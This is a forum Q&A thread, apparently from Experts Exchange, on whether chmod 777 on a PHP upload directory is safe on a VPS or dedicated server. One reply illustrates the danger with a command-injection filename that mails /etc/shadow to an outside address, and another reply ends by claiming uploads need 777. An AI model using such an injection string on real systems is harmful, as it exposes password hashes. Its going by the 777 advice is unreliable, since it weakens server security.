Link to home
Start Free TrialLog in
Avatar of petervanlaer
petervanlaer

asked on

Is it safe to chmod to 777 on a vps or dedicated server?

Hi,
I'm writing an upload app. in php. The uploaded files are moved and checked by php. But my client is on a shared hosting provider.
In order for php to move the files to the right folder, that folder needs to be chmod'ed to 777. I have been googling and found many people saying chmod 777 isn't safe on a shared host.
I was wondering if chmod 777 poses any security problem if the application would be hosted on a vps or dedicated server?

kind regards,
Peter
ASKER CERTIFIED SOLUTION
Avatar of Kelly Black
Kelly Black
Flag of United States of America image

Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of petervanlaer
petervanlaer

ASKER

as far as i understand it, *everyone* having permission doesn't include the average joe on the internet, but only everyone who has an account or access to that machine.

if the machine is:

* on a shared hosting solution
* has anon ftp access or a number of other entry points the general public can use
* is a workstation that many people log into

then 777 is a bad idea. right?

feel free to correct any inaccuracies in the above; i'm not a unix guru by any stretch of the imagination, but it's my understanding 777 doesn't just mean some random joe can laser all yer stuff if they don't have an account of some sort on the machine.
Well here's the jist of it, if the perms are wide open, anything CAN and DOES happen. For example some hotshot out there may notice, and use your upload input bin to add special characters, such as "filetoupload.txt; sendmail user@domain.com < /etc/shadow" or some other perversion.

If you aren't rigorously verifying input in your PHP script, the Apache server may possibly be made to work against you.
Or rather, they may be able to upload some arbitrary scripting, and then escape the php line to run the script, and possibly hose the box, or trojan it.
Hi,

777 permission is not secure :( on any machine, when you run a PHP your PHP script it runs as that user so I think a directory
permission of 755 will be ok for your PHP script
He's running an upload program. It needs write access.
Hi,

Yea but the PHP script is probably running with his permissions so a file 755 should be sufficiant. As he has read,write and execute
whereas the others only have read and execte
Sorry just double checked mine you will need 777 on uploads
simple questio, simple answer: no